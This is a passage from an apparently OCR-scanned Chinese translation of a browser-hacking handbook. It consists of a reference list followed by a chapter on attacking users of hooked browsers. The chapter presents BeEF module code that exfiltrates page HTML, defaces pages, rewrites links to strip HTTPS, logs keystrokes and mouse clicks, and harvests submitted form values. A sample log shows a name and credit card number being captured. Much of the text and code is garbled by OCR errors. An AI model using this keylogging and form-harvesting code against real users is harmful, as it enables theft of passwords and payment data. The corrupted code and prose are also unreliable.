Luca De Fulgentis. (2012). UI Redressing Mayhem: Firefox Oday and the Leakedin Affair. etrieved May 11, 
2013 from http://blog nibblesec.org/2012/12/ui-redressing-mayhem-firefox-Oday-and.html 

Andrew Clover. (2002). CSS visited pages disclosure. Retrieved May 11, 2013 from http://seclists.org/bugtraq/ 
2002/Feb/271 

Jeremiah Grossman. (2007). CSS History Hack. Retrieved May 11, 2013 from http://ha.ckers.org/weird/CSS- 
history-hack.html 

David Baron. (2002). Bug 14777-:visited support allows queries into global history. Retrieved May 11, 2013 
from https://bugzilla.mozilla.org/show_bug.cgi?id=147777 

Edward W. Felten and Michael A. Schneider. (2012). Timing Attacks on Web Privacy. Retrieved May 11, 2013 
from http://selfsecurity.org/technotes/websec/webtiming.pdf 

Michal Zalewski. (2012). Rapid history extraction through non-destructive cache timing. Retrieved May 11, 
2013 from http://lcamtuf.coredump.cx/cachetime/ 

Mansour Behabadi. (2012). visipisi. Retrieved May 11, 2013 from http://oxplot.github.com/visipisi/visipisi. 
html 

Roberto Suggi Liverani. (2012). Maxthon—Cross Context Scripting (XCS)—Aabout:history—Remote Code 
Execution. Retrieved May 11, 2013 from http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting- 
xcs-about-history-rce.html 


攻击 用 户 























人 类 通常 被 认为 是 信息 链条 中 安全 性 最 薄弱 的 一 环 。 对 于 这 种 现象 的 成 因 , 学 界 历来 有 许多 
猜测 : 是 由 于 我 们 固化 的 设计 思路 ?还 是 由 于 在 通信 领域 , 我 们 的 经 验 跟 不 上 技术 日 新 月 异 发 展 
的 脚步 ? 又 或 者 只 是 由 于 我 们 (经常 ) 错误 地 信任 了 通信 对 象 ? 

在 这 一 章 中 , 我 们 将 重点 关注 使 用 电脑 的 普通 用 户 发 起 的 攻击 。 其 中 有 一 些 攻 击 使 用 了 更 先 
进 的 社会 工程 学 手段 , 类 似 于 我 们 在 前 面 章 节 讨论 过 的 在 浏览 带 中 添加 钧 子 的 方法 。 还 有 一 些 攻 
击 利用 了 浏览 器 的 漏洞 或 缺陷 ， 例 如 错误 地 信任 非 同 源 代码 。 


5.1 ”内容 动 持 


在 当前 被 勾 连 的 浏览 器 中 替换 页 面 内 容 , 是 一 种 最 简单 但 常常 被 忽视 的 攻击 方法 , 用 此 方法 
可 以 诱导 用 户 访问 经 过 特意 构造 的 内 容 或 触发 特定 的 操作 。 如 果 你 有 权限 执行 指定 的 非 同 源 
JavaScript 代 码 ， 那 么 就 能 够 获取 到 aocument 中 全 部 的 元 素 ， 也 可 以 在 页 面 中 插入 任意 的 内 容 。 
在 诱导 用 户 执 行 你 指定 的 任意 操作 时 ， 这 是 一 种 非常 隐蔽 而 且 有 效 的 方式 。 

后 文 描述 的 攻击 方法 中 ， 多 数 都 需要 使 用 替换 DOM 元 素 的 技术 。 事 实 上 ， 在 前 面 的 章节 中 
介绍 初始 化 以 及 保持 对 浏览 器 的 控制 时 ， 有 不 少 方法 我 们 都 已 经 讨论 过 。 

那么 ,我 们 从 哪儿 开始 ? 要 明白 重 写 什么 , 我 们 首先 需要 知道 页 面 结构 从 哪里 开始 。 如 果 你 
已 经 支持 了 页 面 ， 事 情 就 非常 简单 了 ， 就 像 从 aocument .body 元 素 中 查找 值 一 样 简单 。 如 果 当 
前 的 页 面包 含 一 个 <body> 标 签 ， 那 么 页 面 中 的 一 切 元 素 都 会 在 这 个 标签 中 。 

可 以 查询 HTML 元 素 的 jnnerHTML 属 性 ， 来 获取 它 自身 以 及 子 元 素 的 语法 。BeEF 模 块 Get 
Page HTML 就 基于 此 实现 : 



























































try { 
var html_head = document.head.innerHTML.toString(); 
j catch (er f 
var html head - "Error: document has no head"; 
} 
try { 
var html body = document .body.innerHTML.toString(); 
} catch (e) { 
var html body = "Error: document has no body"; 


} 
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beef.net.send("<%= @command_url %>", <%= @command_id $%>, 
"head='+html_head+' &body='+html_body) ; 


html_head 和 html_body 两 个 变量 分 别 保存 了 文档 的 header 和 body HJ HTML 代码 。 
toString() 方 法 用 于 显 式 地 把 它们 转化 为 字符 串 。 最 后 的 beef .net .send() 方 法 则 用 于 把 结 
果 提 交 回 BeEF 服 务 器 。 


BeEF 模 块 中 net . send 的 工作 原理 


我 们 曾 在 第 3 章 中 深入 探讨 了 持续 控制 ,但 是 BeEF 在 底层 有 许多 有 趣 的 代码 ， 可 以 简化 命 
令 模 块 向 框架 传 数据 的 流程 。 这 里 的 beef .net .send() 方 法 就 是 个 典型 的 例子 。 

为 了 能 给 命令 模块 提供 一 种 可 靠 的 方法 ， 来 将 数据 提交 回 BeEF 服 务 器 ，BeEF 在 服务 端 提 
供 了 beef.net.send() 方 法 以 及 与 之 相关 的 数据 处 理 程序 。 

我 们 注意 到 ， 前 面 调用 beef .net.send() 方 法 时 传 了 三 个 参数 
@common_id 以 及 一 个 字符 串 值 ， 在 前 面 的 例子 中 即 : 'head='+html_head+'&body=' 
+html_body 。BeEF 会 在 命令 模块 被 提交 到 用 户 浏览 器 前 ， 对 其 进行 一 些 处 理 : 将 
QGcommand url 替换 为 当前 命令 的 URL， 将 GQcommang id 替换 为 它 的 唯一 ID 。 妆 
beef .net.send() 发 送 回 这 些 数据 时 ，BeEF 服 务 器 能 区 分 出 数据 源 于 哪个 命令 模块 。 这 就 允 
许 了 攻击 者 同时 提交 多 个 命令 模块 ， 并 使 其 响应 与 请 求 一 一 对 应 。 

代码 按 以 下 步骤 执行 。 

(1) beef.net.send() 将 命令 模块 或 其 他 BeEF 库 提供 的 任意 数据 添加 到 一 个 JavaScript 数 
AP a 

(2) BeEF 的 轮 询 器 调用 beef .net.flush() 方 法 ， 该 方法 的 功能 如 下 : 

O 将 数组 对 象 转化 为 JSON 格 式 ，; 

O 对 JSON 格 式 的 变量 进行 base64 编 码 ; 

D 对 编码 后 的 数据 按 预 定 长 度 进行 分 块 ; 

口 使 用 GET 请 求 将 所 有 数据 包 异 步 发 送 回 BeEF 服 务 器 ,发 送 时 在 数据 中 添加 上 序列 标 
识 符 。 

(3) BeEF 服 务 器 收 到 全 部 响应 后 进行 解析 ， 还 原 原 始 数据 。 

要 查看 beef .net .send 完 整 的 代码 ， 可 以 访问 https://browserhacker.com， 或 者 Wiley 的 网 
3bwww.wiley.com/go/browserhackershandbook 。 











@common_url , 








假设 勾 连 的 页 面包 含 以 下 内 容 : 


<div id="header">This is the title of my page</div> 
<div id="content">This is where most of the content of my page rests. 
And this page has lots of interesting content</div> 


你 可 以 用 下 面 的 JavaScript 代 码 ， 在 不 影响 其 他 元 素 的 前 提 下 操作 neagder 元 素 : 
document.getElementById('header').innerHTML = "Evil Defaced Header"; 


你 也 可 以 借助 jQuery 提供 的 强大 的 选择 器 来 简化 这 些 操 作 。 要 使 用 BeEF 提 供 的 jQuery 达到 同 
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样 的 功能 ， 只 需要 执行 以 下 代码 : 

$j('theader').html('Evil Defaced Header') ; 

BeEF 包 含 了 一 个 简单 的 模块 ， 用 来 替换 页 面 中 的 标准 元 素 ， 包 括 HIML body, 、title 以 及 图 
标 。 在 页 面 中 重 写 已 有 内 容 时 ，Replace Content (Deface) 模 块 会 毫 无 警告 地 直接 覆 盖 原 有 内 容 。 
所 以 在 使 用 它 时 请 小 心 ， 因 为 对 你 的 目标 来 说 ， 这 个 操作 可 能 过 于 明显 。 这 个 模块 提供 了 以 下 
三 个 函数 : 

document .body.innerHTML = "<%= @deface content %>"; 


document.title = "<%= @deface title %>"; 
beef .browser.changeFavicon("<%= @deface favicon %>"); 


第 一 个 函数 用 来 把 aocument .bodqy 的 HTML 代码 ,替换 成 用 户 通过 edqaeface_content 变 量 
提交 的 动态 内 容 。 需要 注意 的 是 , 通过 @deface_content 添 加 的 <script> 元 素 并 不 会 自动 执行 
以 及 添加 到 文档 的 head 中 。 但 你 可 以 通过 使 用 defer’ 或 其 他 类 似 的 属性 , 来 手动 控制 脚本 的 执行 
时 机 。 

Ruby 的 Erubis 库 提供 了 动态 绑 定 的 功能 ， 也 就 是 在 模块 真正 被 发 送 回 浏览 器 前 ， 才 把 模块 中 
的 值 蔡 换 为 真实 值 。 对 于 第 二 个 函数 ,除了 它 重 写 的 是 aocument .title 属 性 外 ,其 他 功能 与 第 
一 个 函数 基本 一 样 。 最 后 一 个 函数 则 提供 了 替换 页 面 图 标的 功能 ， 主 要 逻辑 由 BeEF 的 change- 
Favicon () 函数 完成 ， 其 原理 是 通过 修改 aocument .head 元 素 ， 来 移 除 所 有 现存 的 页 面 图 标 元 
素 ， 然 后 再 添加 一 个 新 的 ， 例 如 : 


<link id="dynamic-favicon" rel="shortcut icon" 
href="http://browserhacker.com/favicon.ico"> 


如 果 这 种 简单 粗暴 的 替换 无 法 满足 你 的 需求 ， 你 可 以 尝试 使 用 Replace Component (Deface) 
模块 。 比 起 前 面 那 种 只 能 整体 奉 换 aocument .podqy 内 容 的 方法 ， 该 模块 提供 了 更 细 粒 度 的 DOM 
元 素 选 择 和 替换 ， 示 例如 下 (有些 类 似 于 之 前 使 用 jQuery 重 写 指定 元 素 的 代码 ): 


var result = $j('«$- @deface selector %>').each(function() { 
$j (this) .html('<%= @deface content $-'); 
}) .length; 

















































































































beef.net.send("<%= @command_url %>", <%= @command_id %>, 
"result=Defaced " + result +" elements"); 


通过 使 用 jQuery 提供 的 选择 器 *， 我 们 只 需 使 用 一 条 命令 ， 就 能 实现 对 一 个 DOM 元 素 或 一 组 
DOM 元 素 的 替换 。 前 面 的 代码 使 用 adaeface_selector 变 量 作为 选择 器 ， 然 后 使 用 edaeface_- 
content 变 量 依次 循环 替换 元 素 的 HTML 人 代码。 最 后 把 经 过 修改 的 元 素 的 数量 发 送 回 BeEF 服 务 器 。 

除了 这 些 整体 替换 元 素 的 模块 ，BeEF 也 提供 了 一 些 自动 重 写 DOM 元 素 内 容 的 模块 。 

口 替换 HREF : 类 似 于 Replace Component 模 块 ， 这 个 模块 循环 替换 所 有 <a> 元 素 的 HREF 
属性 。 

O 替换 HREF 〈 点 击 事件 ) : 这 个 模块 和 上 一 个 “替换 HREF” 模 块 几 乎 一 样 ， 唯 一 的 区 别 
是 只 在 onclick 时 才 触 发 修改 ， 而 且 并 不 真正 修改 元 素 的 HREF 属 性 。 这 有 些 类 似 于 曾 在 
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3.3.4 节 中 介绍 过 的 “中 间 人 攻击 ”技术 。 如 果 <a> 元 素 本 身 已 经 包含 了 onclick 属 性 , IB 
么 原始 的 属性 将 会 被 覆盖 掉 。 你 可 以 根据 需要 修改 这 个 默认 行为 ， 例 如 在 一 次 onclick 
时 触发 多 个 动作 。 

O 替换 HREF (HTTPS) : 这 个 模块 同样 和 “替换 HREF” 模 块 很 相似 ,但 它 的 功能 是 把 所 
有 指向 https:/W/ 站 点 的 链接 改写 为 http:// 协 议 。 如 我 们 曾 在 第 2 章 “ARP 欺 骗 ” 中 介绍 过 的 那 
样 ， 这 个 模块 通常 和 sslstrip 一 起 使 用 。 

O 替换 HREF (TEL) : 把 页 面 中 所 有 的 tel:// 链 接 更 改 为 一 个 你 指定 的 新 电话 号 码 。 这 个 功 

能 主要 针对 手机 上 的 浏览 器 起 作用 ， 可 以 拦截 一 些 敏感 的 。 

口 替换 视频 : FE ATA <embed> IER ARN B A 3X YouTube 

这 里 列 出 的 并 不 是 网 页 劫持 的 全 部 方法 。 事 实 上 ,只 要 获得 在 宿主 网 页 执行 JavaScript 的 权限 ， 

就 能 够 把 网 页 中 的 任意 DOM 元 素 更 改 为 你 所 希望 的 内 容 。 
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虽然 修改 页 面 内 容 可 以 协助 欺骗 目标 用 户 执行 危险 的 操作 , 但 有 时 你 根本 无 需 修 改 页 面 中 显 
示 的 内 容 ， 就 能 够 获取 到 一 些 敏 感 信 息 。DOM 的 功能 除了 在 页 面 中 展示 可 视 化 实体 外 ， 还 包括 
设置 和 执行 事件 处 理 函 数 。Web 开 发 者 可 以 利用 这 些 特性 去 监听 页 面 加 载 、 鼠 标点 击 和 鼠标 滑 过 














































































































所 有 这 些 事件 类 型 可 以 被 分 为 几 类 ， 比 如 焦点 事件 、 鼠 标 事 件 和 键盘 事件 等 。 接 下 来 的 几 小 
节 会 介绍 这 些 不 同 的 事件 ， 并 详细 讲解 针对 它们 的 监听 方法 。DOM 自 身 的 分 层 结构 ， 使 得 事件 
在 触发 时 通常 会 先 向 上 ( 顶层 DOM ) 传输 ， 然 后 再 向 下 ( 底层 DOM ) 传输 ， 亦 即 我 们 熟知 的 事 
件 流 。 这 也 就 解释 了 为 什么 一 个 事件 可 以 触发 多 个 事件 处 理 函 数 。 

在 本 节 的 最 后 , 你 将 学 到 怎样 向 多 种 浏览 器 绑 定 自 定义 监听 函数 ， 比 如 用 它们 来 监控 键盘 输 
入 、 鼠 标 移 动 乃至 窗口 被 激活 的 时 间 。 
事件 流 

在 W3C 标 准 中 定义 了 两 种 事件 流 : 事件 捕获 和 事件 冒 泡 。 不 管 哪 种 事件 流 ， 所 有 的 事件 都 
有 一 个 定义 的 目标 元 素 , 而 且 会 保证 响应 事件 可 以 执行 。 事件 从 DOM 的 顶层 元 素 document 层 
层 向 下 传递 ， 直 到 抵达 目标 元 素 。 

任何 在 顶层 元 素 和 目标 元 素 之 间 的 事件 监听 器 ， 只 要 事件 类 型 相同 ( 比如 同 为 click 或 同 
Akeypress ), 就 能 捕获 该 事件 并 进行 响应 。 而 在 目标 元 素 接 收 到 事件 并 进行 响应 之 后 ,事件 
会 反 过 来 没 原 DOM 路 径 向 上 传输 ， 并 响应 相应 的 事件 监听 器 ， 这 个 过 程 也 叫 作 事件 冒 泡 。 

为 什么 会 同时 存在 事件 捕获 和 事件 冒 泡 呢 ?这 是 由 于 最 初 不 同 的 浏览 器 厂商 实现 了 不 同 
的 方法 ， 例如， 网 景 希望 在 事件 没 DOM 向 下 传递 时 捕获 事件 ， 而 微软 则 希望 在 向 上 传递 时 捕 
获 事 件 。 标准 并 没有 否定 其 中 的 一 种 方案 , 而 是 取 了 两 种 方案 的 合集 。 这 是 另 一 个 关于 不 同 浏 
览 器 之 间 奇 怪 而 又 重要 的 差异 的 例子 。 
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5.2.1 使 用 焦点 事件 


每 次 用 户 访 问 一 个 网 站 ， 都 是 浏览 絮 在 和 当前 泻 染 过 的 网 页 的 DOM 进 行 交互 。 即 使 用 户 并 
没有 点 击 网 页 上 的 任何 元 素 , 也 没有 填写 任何 表单 , 浏览 器 也 可 能 捕获 到 一 些 对 攻击 者 有 价值 的 
言 息 。 例 如 ， 即 使 用 户 在 网 页 中 点 击 过 几 次 后 又 点 击 了 别处 ,浏览 器 还 是 已 经 触发 了 两 个 不 同 的 
事件 : focus 和 blur。 

继续 之 前 的 例子 ， 执 行 下 面 的 JavaScript 代 码 ， 就 能 够 监听 focus 事 件 ; 

window.addEventListener("focus", function(event) { 


alert ("The window has been focused"); 


4457 

IE6 到 IE8 并 不 支持 addEventListener() 方 法 ,不 过 它们 可 以 使 用 功能 类 似 的 
addachEvent () 图 数 ' 代 替 。jQuery 提 供 了 更 加 友好 的 on () 函数 ， 可 以 简化 事件 监听 的 操作 。 使 
用 BeEF 提 供 的 jQuery 后 ， 上 面 的 代码 会 变 成 : 

$j (window).on("focus", function(event) { 


alert ("The window has been focused"); 


En 
不 仅 如 此 ，jQuery 还 提供 了 focus () 方 法 ， 可 以 进一步 简化 代码 : 


Sj (window).focus(function(event) { 
alert ("The window has been focused"); 


be 
再 增加 一 些 代 码 ， 则 我 们 同时 可 以 在 用 户 将 焦点 从 窗口 中 移 除 时 捕获 事件 : 


Sj (window) .focus(function(event) ( 
alert ("The window has been focused"); 
}) .blur(function(event) { 
alert ("The window has lost focus"); 


)): 

由 于 调用 jQuery 的 方法 时 ， 通 常 返回 自身 的 实例 ,所 以 当 我 们 在 调用 多 个 方法 时 可 以 使 用 链 
式 调用 ,就 像 之 前 那 段 代码 所 示 。 这 段 代码 监听 了 window 对 象 上 的 focus 和 blur 事 件 , 这 和 BeEF 
初始 化 日 志方 法 的 代码 非常 类 似 ， 不 同 之 处 在 于 BeEF 不 是 调用 alert () 函数 ， 而 是 使 用 之 前 讲 
过 的 beef .net .seng() 函数 ， 把 事件 日 志 传 回 BeEF 的 服务 器 。 

在 W3C 的 DOM 3 级 事件 模型 草案 的 文档 中 ， 焦 点 事件 类 型 并 不 局 限于 blur 和 focus。 除 了 























































































































document 元 素 自 身 外 , DOM 中 的 任 一 元 素 都 可 以 响应 全 部 的 焦点 事件 。 除 blur 和 focus 外 ，W3C 
还 定义 了 如 下 一 些 与 焦点 相关 的 事件 ， 按 它们 触发 的 次 序 排列 如 下 。 
O focusin: 在 目标 元 素 真正 获得 焦点 之 前 触发 。 








D focus: 在 目标 元 素 真 正 获得 焦点 时 触发 。 

O DOMFocusIn: 弃 用 的 DOM 事 件 ， 推 荐 使 用 focus 和 focusin 和 替代。 
口 Focusout: 在 目标 元 素 改 变焦 点 之 后 触发 。 

Q blur: 在 目标 元 素 失去 焦点 时 触发 。 
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O DOMFocusout: 弃 用 的 DOM 事 件 ， 推 荐 使 用 plur 和 focusout 替 代 。 

通常 来 讲 ， 相 比 元 素 失去 焦点 时 , 浏览 絮 会 在 元 素 获得 焦点 时 触发 更 多 事件 。 其 中 多 数 事件 
都 会 在 响应 时 传人 event 对 象 ,其 中 包含 了 获得 焦点 的 元 素 的 信息 ,以 及 元 素 在 事件 流 中 的 位 置 等 。 

对 攻击 者 而 言 ， 理 解 和 捕获 焦点 事件 是 非常 有 用 的 ， 因 为 通过 它们 , 我 们 可 以 洞察 到 目标 用 
户 是 否 正 在 浏览 特定 的 窗口 ， 是否 已 经 切换 到 不 同 的 标签 页 ， 或 者 是 否 已 经 将 浏览 器 最 小 化 ,这 
些 数据 都 可 能 在 一 个 大 型 攻击 策略 中 发 挥 重要 作用 。 


5.2.2 ”使 用 键盘 事件 


如 果 你 可 以 捕获 鼠标 以 及 焦点 事件 , 那么 你 肯定 也 能 捕获 一 些 其 他 有 价值 的 交互 事件 ， 比 如 
按键 事件 。Gmail 就 是 一 个 非常 典型 的 在 Web 应 用 中 使 用 键盘 快捷 键 的 案例 。 在 开启 该 功能 后 *， 
Gmail 会 监听 并 响应 键盘 事件 ， 并 人 允许 用 户 在 双手 无 需 离开 键盘 的 情况 下 ， 打 开 邮 件 或 完成 一 些 
其 他 操作 。 

同 焦点 事件 和 鼠标 事件 类 似 ， 键 盘 事件 也 分 为 多 个 ,分 别 具 有 不 同 的 功能 , 它们 的 响应 顺序 
如 下 。 

O keydown: 当 一 个 键 被 按 下 时 。 

O keypress: 当 一 个 键 被 按 下 时 ,但 是 这 个 键 需要 有 一 个 相关 联 的 值 。 例 如 ， 按 一 下 Shift 
键 并 不 会 触发 keypress 事 件 ， 但 会 触发 keydown 和 keyup 事 件 。 

O keyup: 当 一 个 键 被 松 开 时 。 

如 果 攻 击 者 拦截 了 全 部 这 些 事 件 , 那么 , 无 论 用 户 是 否 输入 到 表单 中 的 输入 框 里 , 他 都 能 监 
控 到 所 有 键盘 输入 "。BeEF 为 了 保证 日 志 不 至 于 太 过 宛 长 ， 它 只 上 报 鼠 标的 cl ick 事 件 以 及 键盘 
的 keypress 事 件 。 为 了 能 捕获 这 些 事件 ，BeEF 中 首先 用 下 面 的 代码 ， 为 事件 绑 定 了 响应 函数 。 
这 里 的 参数 e 包 含 了 携带 信息 的 事件 对 象 ， 比 如 按 的 是 哪个 键 ， 键 的 位 置 ， 以 及 这 个 键 是 否 被 长 
按 了 ， 等 等 : 


$j (document) .keypress ( 
function(e) { beef.logger.keypress(e); } 


); 

beef.logger.keypress() 函数 用 来 探测 用 户 输入 数据 的 元 素 是 否 发 生 过 变化 ( 例如 ， 用 
户 可 能 先 在 一 个 输入 框 中 进行 输入 ， 然 后 切换 到 另 一 个 输入 框 中 )。 当 检测 到 元 素 改变 时 ， 之 前 
输入 的 字符 会 被 提交 回 BeEF : 

keypress: function(e) { 


if (this.target == null || 
($j (this.target) .get (0) 































































































































































































!== $j(e.target).get(0))) 
{ 

beef.logger.push_stream(); 

this.target = e.target; 
} 
this.stream.push({'char':e.which, 

'modifiers': ( 
'alt':e.altKey, 
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'ctrl':e.ctrlKey, 
'shift':e.shiftKey) 
j 
); 
} 


beef. logger.push_stream() 函数 用 于 核对 保存 在 stream 数 组 中 的 所 有 按键 事件 ， 并 把 
它们 重新 放 回 BeEF 的 事件 队列 中 。 在 每 一 次 的 轮 询 请 求 中 ， 这 个 队列 中 的 数据 会 通过 
beef .net .send() 发 送 回 BeEF。 

为 了 能 兼容 各 种 键盘 在 布局 、 格 式 、 语 言 和 国际 化 上 的 差异 ，DOM 通 过 event 对 象 上 的 key 
和 char 属 性 来 定义 不 同 的 键 值 。 这 些 属性 都 使 用 Unicode 编 码 "， 从 而 适应 各 种 语言 。char 属 性 
的 值 是 按键 显示 的 内 容 ， 如 果 按 键 不 包含 可 显示 的 内 容 ， 这 个 属性 值 将 为 空 。 

key 属 性 则 保存 键 值 。 对 于 char 属 性 的 值 不 为 空 的 按键 , 它 的 key 属 性 是 一 个 和 char 属 性 相 
对 应 的 值 。 如 果 按 键 不 可 显示 ， 比 如 Alt 键 , 它 的 key 属 性 会 是 一 个 预定 义 的 值 。W3C 的 文档 中 有 
关于 所 有 按键 的 定义 : http://www.w3.org/TR/DOM-Level-3-Events/#key-values-list。 

同时 W3C 也 规定 了 下 列 关于 选择 和 定义 键 值 的 参考 标准 。 

口 如 果 按 键 的 功能 是 生成 一 个 可 打印 的 字符 ， 并 且 在 键 值 中 包含 有 效 的 字符 : 

> key 属性 必须 为 键 值 组 成 的 字符 串 
> char 属性 必须 为 char 值 组 成 的 字符 串 

m 如 果 在 键 值 中 不 包含 有 效 的 字符 : 
> key 属性 必须 为 char 值 组 成 的 字符 串 
> value 属性 必须 为 char 值 组 成 的 字符 串 

口 如 果 按 键 是 一 个 功能 键 或 者 修改 键 ， 并 且 在 键 值 中 包含 有 效 的 字符 : 

> key 属性 必须 为 键 值 组 成 的 字符 串 
> char 属性 必须 为 空 字符 

w 如 果 在 键 值 中 不 包含 有 效 的 字符 ， 则 创建 一 个 键 值 

尽管 此 标准 主要 规定 了 key 和 char 的 值 ， 但 有 许多 程序 仍 在 依赖 已 废弃 而 且 文 档 不 完善 的 
keyCode 和 charcogde 属 性 。 旧 的 标准 中 还 定义 了 一 个 which 属 性 ， 用 一 个 特定 数字 来 代表 被 按 
下 的 键 ， 通常 和 keycode 的 值 相同 。 

你 可 能 注意 到 ,在 之 前 的 代码 片段 中 ,我 们 曾 使 用 过 event .which 变 量 的 值 ,这 是 由 于 jQuery 
为 了 兼容 各 浏览 需 而 重 写 了 该 属性 。 

不 同 浏览 器 对 键盘 事件 的 实现 差异 相当 大 。Jan Wolter 曾 为 此 写 过 一 篇 调查 文章 ， 题 为 
“JavaScript 的 疯狂 : 按键 事件 ”“"。 这 些 差异 中 绝 大 部 分 均 起 源 于 浏览 器 大 战 "。 这 也 解释 了 为 什 
么 keycode 属 性 首先 在 正中 开始 使 用 ， 而 which 属 性 则 被 其 他 浏览 器 ( 如 Firefox ) 采用 。 

尽管 不 同 浏览 器 对 事件 的 处 理 方法 存在 差异 , 但 监听 按键 事件 仍 是 一 个 非常 有 效 的 工具 。 使 
用 JavaScript 捕 获 这 些 事 件 ， 并 把 它们 发 回 给 你 ， 可 以 让 你 发 现 各 种 信息 。 如 果 监 听 的 节点 无 误 ， 
甚至 能 捕获 到 非常 敏感 的 信息 ， 比 如 用 户 密码 以 及 支付 信息 等 。 
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5.2.3 ”使 用 鼠标 和 指针 事件 

















DOM 提 供 的 另 一 组 事件 是 鼠标 以 及 指针 类 








型 事件 。 顾 名 思 义 ,它们 与 鼠标 (或 轨迹 球 ) 和 




















DOM 的 交互 相关 。 指 针 事 件 与 鼠标 事件 类 似 , 区 别 在 于 它 是 由 未 配置 鼠标 的 设备 C 比如 智能 手 
机 和 平板 电脑 ) 触发 。 与 监听 DOM 中 元 素 的 焦点 事件 类 似 ， 监 听 此 类 事件 可 以 监控 页 面 中 所 有 





的 鼠标 移动 和 点 击 动作 ， 甚 至 包括 一 些 超出 页 面 范围 的 动作 。 
屏幕 键盘 或 虚拟 键盘 有 时 用 于 阻止 键盘 按键 被 记录 , 例如， 在 月 




















输 


有 户 输入 网 银 密 码 时 使 用 。 而 





攻击 者 可 以 通过 监听 用 户 的 鼠标 事件 ， 获 得 鼠标 移动 以 及 点 击 时 的 指针 坐标 。 所 以 ， 即 便 用 户 输 
入 密码 时 未 使 用 实体 键盘 ， 其 密码 仍 有 可 能 被 窃取 。 
除了 监控 鼠标 事件 , 目前 有 不 少 已 知 的 技术 可 以 攻破 银行 使 用 的 虚拟 键盘 。 此 外 还 可 以 使 用 












































屏幕 截图 、 借 助 Win32 API 读 取 包 含 虚拟 键盘 的 HTML 文 档 等 方法 ”。 
下 面 是 一 个 事件 处 理 孙 数 的 示例 ， 该 函数 会 捕获 用 户 每 一 次 点 击 文 档 的 事件 : 
document.addEventListener("click",function(event) { 
alert("X: "+event.screenX+", Y: "+event.screeny) ; 


3): 


这 段 JavaScript 代 码 对 鼠标 的 click 事 件 绑 定 了 一 个 监听 函数 , 功能 是 弹出 警告 对 话 市 








中 显示 鼠标 的 位 置 ( 相对 于 当前 屏幕 的 位 置 ， 
该 事件 对 














EJ 


以 像素 为 单位 Je 除了 screenx 和 screenY 属 ' 





FER 
生 外 ， 





属性 ， 用 于 指出 鼠标 指针 相对 于 视 口 的 坐标 。 





F 


象 中 还 包含 clientx 和 clientY 
相对 


化 窗口 ， 而 且 大 小 不 会 发 生 改 变 。 图 5-1、 图 5 
于 视 口 的 坐标 和 相对 于 页 面 的 坐标 。 








eoo y W Beer - The Browser Explo X \\ 


于 视 口 的 坐标 和 相对 于 屏幕 的 坐标 可 


eb AN 


能 会 略 有 差异 , 因为 视 口 永远 代表 着 浏览 器 的 可 视 
-2 和 图 5-3 分 别 展示 了 鼠标 相对 于 屏幕 的 坐标 、 相 对 
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图 $-2 ”相对 于 视 口 的 坐标 
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图 5-3 ”相对 于 页 面 的 坐标 


如 果 使 用 jQuery ( 如 下 面 的 代码 所 示 ), 同样 可 以 获取 pagex 和 pageY 变 量 , 即 相 对 于 <HTML> 
开始 处 的 坐标 : 
$j (document) .click (function(event) ( 


alert ("X: "+event.pageX+", Y: "«event.pageY); 


} 
除了 简单 的 点 击 事件 外 ， 鼠 标 事件 类 型 还 包括 : 
鼠标 从 元 素 上 移动 


























口 mousemove 
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KEP 





ouseover 





OUS nter 


鼠标 移 人 元 素 的 边界 








与 nouseovez 类 似 ， 但 事件 不 会 骨 泡 





ouseout 




















鼠标 移出 元 素 的 边界 





至 父 元 素 





与 nouseleave 类 似 ， 但 事件 不 会 骨 泡 至 父 元 素 








ouseleav 





Oooooo 














ousedown 一 一 在 元 素 上 按 下 鼠标 键 
ouseup 一 一 在 元 素 上 松 开 鼠标 键 


BeEF 事 件 日 志 


默认 状态 下 ，BeEF 会 自动 记录 本 章 中 提 到 的 所 有 类 型 的 事件 。 图 5$-4 展 示 了 键盘 和 鼠标 事 


件 的 日 志 格式 。 














如 果 你 能 够 控制 DOM， 就 能 
移动 的 方式 。 因 为 DOM 还 会 暴露 滚轮 寻 








Event 


5 

7 Event 
8 Event 
9 Event 
10 Event 
11 Event 
12 Event 
13 Event 
14 Event 
15 Event 
16 Event 
17 Event 
18 Event 
19 Event 
20 Event 
21 Event 
22 Event 


0.728s - [Blur] Browser window has lost focus. 


12.598s - 
14.532s - 
15.629s - 
18.538s - 
20.008s - 
21.932s - 
22.941s - 
25.402s - 
26.972s - 
27.994s - 
29.004s - 
30.012s - 
30.9885 - 
31.021s - 
32.232s - 


[Focus] Browser window has regained focus. 
[Mouse Click] x: 276 y:287 > div 

[Mouse Click] x: 262 y:317 > button 

[Mouse Click] x: 371 y:318 > button 

[Mouse Click] x: 309 y:400 > input (yourname) 
[User Typed] "Mic 

[User Typed] "hele 

[Mouse Click] x: 313 y:474 > input (creditcard) 
[User Typed] "444 

[User Typed] "45555 

[User Typed] "6666 

[User Typed] "777 

[Mouse Click] x: 305 y:510 > div#hamper 
[User Typed] "7 

[Mouse Click] x: 274 y:576 > input (yourname) 


4.697s - [Blur] Browser window has lost focus. 








图 5-4 BeEF Pics I) RE TERI BUE 














页 面 的 时 间 。 通 过 把 所 有 这 些 事件 
连 的 页 面 中 的 所 有 操作 。 


5.2.4 ”使 用 表单 事件 


除了 对 所 有 元 素 监听 键盘 事件 外 ，BeEF 还 针对 所 有 <form> 元 素 提 供 了 自 定义 逻辑 。 通 过 使 
用 jQuery 的 元 素 选择 器 ， 执 行 下 面 的 代码 ， 会 在 当前 DOM 中 的 所 有 表单 的 submit 事 件 上 绑 定 








beef.logger. sub 








it () PRR: 


$j ('form') .submit ( 
{ beef.logger.submit(e); } 


function(e) 


3); 








ft 


Qus 














十 获 所 有 类 型 的 鼠标 事件 ， 还 能 查看 并 记录 鼠标 光标 在 网 站 上 











HFW, ， 所 以 你 可 以 追踪 用 户 使 用 滚轮 向 上 和 癌 下 滚动 
结合 在 一 起 ， 从 技术 上 讲 , 甚至 可 以 重新 创 到 








和 监控 用 户 在 匀 
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beef .logger. submit () 函数 通过 遍历 表单 ， 取 出 所 有 输入 框 的 值 ( 包 括 隐藏 元 素 )， 然 后 


把 它们 发 送 回 BeEF 服 务 咒 


/** 


* 只 要 有 表单 提交 ， 就 将 激发 Supmjt 函 数 


kf 
submit: function(e) 
try { 


{ 


var f = new beef.logger.e(); 


var values - "" 


f.type - 'submit'; 


f.target - 
for (var ecc 
values + 


beef.logger.get dom identifier(e.target); 


i < e.target.elements.length; i++) { 


nT regan 


values +=e.target.elements[i].name; 


values +="="+e.target.elements[i].value+"\n"; 
j 
f.data = 'Action: '-«$j(e.target).attr('action'); 
